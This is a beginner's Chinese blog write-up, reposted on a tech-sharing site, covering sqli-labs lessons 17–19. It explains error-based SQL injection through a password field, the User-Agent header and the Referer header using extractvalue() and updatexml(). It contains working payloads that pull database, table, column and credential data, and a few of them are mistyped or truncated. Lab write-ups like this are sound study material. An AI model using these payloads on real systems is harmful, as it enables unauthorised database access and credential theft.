标签：19 0x7e labs sqli 报错 select table concat 注入

Less17 基于POST显错式注入

1.在账号框测试后，无法使用数据库报错或者使是页面显示错误，前面学到的方法在这里都没有效果。查看源码后得知这道题对账号进行了check_input()的处理，但是对密码没有进行处理，所以这里直接针对密码进行sql注入。
2.User Name 输入admin ，针对密码进行注入。 通过extractvalue()函数保错式注入。

(1) 查询库名payload -1'and extractvalue(1,concat(0x7e,database()))#
(2) 查询表名payload -1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))#
(3) 查询列名payload -1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e

(4)查询users表中的username 和 password值
查询users表中username时报错，-1' and extractvalue(1,concat(0x7e,(select username from users limit 0,1)))#
提示 ：You can't specify target table 'users' for update in FROM clause 大概意思就是不能select出表中某些值，再update这个表
解决方法： 再套一层循环，并对自循环的结果起名。这样就规避了对同一个表select 后更新，相当于是说，将子查询构成一个表，父查询再去查询这个新表。
查询username的payload -1' and extractvalue(1,concat(0x7e,(select username from (select username from users limit 0,1) abc ),0x7e))#
password的payload同理，将username换成password即可，不在赘述。

Less18 Useragent注入

1.判断注入点和注入类型
账号和密码处都无法完成注入，查看源码后发现后台对账号和密码都进行了check_input()处理，基本上无法从这两个点进行注入，但是可以观察到的正常登录后，会显示出ip 和Your User Agent ，可以考虑注入点在这两个地方。
2.用burpsuit进行抓包，查看请求的useragent和ip
在useragent处测试输入 ' ，分析页面的报错信息，我们是在useragent的后面加入单引号，但是数据库报错却是后面ip和username的部分，说明我们加入单引号后，闭合了前面的单引号逻辑正常，而导致后面的语句产生了逻辑错误。

所以猜测这数据库执行的是 insert into tbname values (?,?,?); 的数据库插入语句。
当在第一个问号处插入单引号时，报错信息满足当前的报错信息。
3.通过修改useragent的值，达到注入的目的。结合sql语句，insert into tbname values ('','','');
我们不仅需要闭合第一个单引号还需要闭合前面的括号，并且将后面的sql语句注释。当闭合括号时，需要我们为参数赋值，这样才不会产生错误。可以得出payload为
1',1,1)# 1的位置替换成其他的sql语句。

4.根据页面可以有报错，选择extractvalue()报错注入，注入点在useragent。只需要把1替换成报错语句即可。附上部分payload

查询库名 1',extractvalue(1,concat('~',database())),1)#
查询表名 1', extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e)) ,1)#
查询列名 1' ,extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e)),1)#

 

Less19 Referer注入

1.判断注入点和注入类型

此题对账号和密码进行了check_input()处理，注入点也不再账号和密码。登录后页面有ip地址和You Referer,和上一关类似，这关的注入点在Referer
2.用burpsuit进行抓包，查看request的Referer
在Referer出输入 ' 测试，可以看到报错信息与上一关类似，这里的报错信息也将ip部分报出，可以联想到这里也是用insert into语句把Referer和ip插入表中。

 

 

3.注入方法与上一题一样，闭合 ' 和) 并注释后面的sql语句 1',1)# 1位置可以替换成其他的其他的sql语句
4.选择报错注入的方法，使用upadtexml()函数，附上部分payload

查库名 1',updatexml(1,concat(0x7e,database(),0x7e),1) )#
查表名 1',updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))#
查字段名 1',update(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1))#

 

 

PS小白总结

(1) 寻找注入点不要拘泥于一点，只在账号或者密码出尝试注入。如果页面没有发现注入点，可以进行抓包寻找别的注入点。

(2) 根据页面的显示选择注入的方法，比如页面可以显示数据库的信息可以采取显错式注入，页面会有数据库报错选择报错式注入，没有回显信息可以选择盲注。

 

小白sql注入学习！！

标签：19,0x7e,labs,sqli,报错,select,table,concat,注入
来源： https://www.cnblogs.com/ersuani/p/sqlilab_less17-19.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。